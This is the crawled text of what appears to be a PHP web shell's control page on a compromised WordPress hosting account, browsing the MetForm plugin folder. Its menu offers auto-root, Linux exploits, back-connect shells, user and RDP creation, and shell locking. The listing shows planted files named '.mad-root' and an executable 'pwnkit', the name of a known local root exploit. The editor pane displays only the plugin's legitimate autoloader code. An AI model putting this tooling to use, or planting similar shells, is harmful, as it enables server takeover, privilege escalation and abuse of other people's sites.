Linux webm021.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.127.20.21 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
5.4.45
premiey
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
premiey /
www /
wp-content /
plugins /
metform /
[ HOME SHELL ]
Name
Size
Permission
Action
base
[ DIR ]
drwxr-xr-x
controls
[ DIR ]
drwxr-xr-x
core
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
traits
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
widgets
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
autoloader.php
1.41
KB
-rw-r--r--
metform.php
1.67
KB
-rw-r--r--
phpcs.xml
3.9
KB
-rw-r--r--
plugin.php
27.58
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
40.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : autoloader.php
<?php namespace MetForm; defined( 'ABSPATH' ) || exit; /** * MetForm autoloader. * Handles dynamically loading classes only when needed. * * @since 1.0.0 */ class Autoloader { /** * Run autoloader. * Register a function as `__autoload()` implementation. * * @since 1.0.0 * @access public */ public static function run() { spl_autoload_register( [ __CLASS__, 'autoload' ] ); } /** * Autoload. * For a given class, check if it exist and load it. * * @since 1.0.0 * @access private * @param string $class Class name. */ private static function autoload( $class_name ) { // If the class being requested does not start with our prefix // we know it's not one in our project. if ( 0 !== strpos( $class_name, __NAMESPACE__ ) ) { return; } $file_name = strtolower( preg_replace( [ '/\b'.__NAMESPACE__.'\\\/', '/([a-z])([A-Z])/', '/_/', '/\\\/' ], [ '', '$1-$2', '-', DIRECTORY_SEPARATOR], $class_name ) ); // Compile our path from the corosponding location. $file = plugin_dir_path(__FILE__) . $file_name . '.php'; // If a file is found. if ( file_exists( $file ) ) { // Then load it up! require_once( $file ); } } }
Close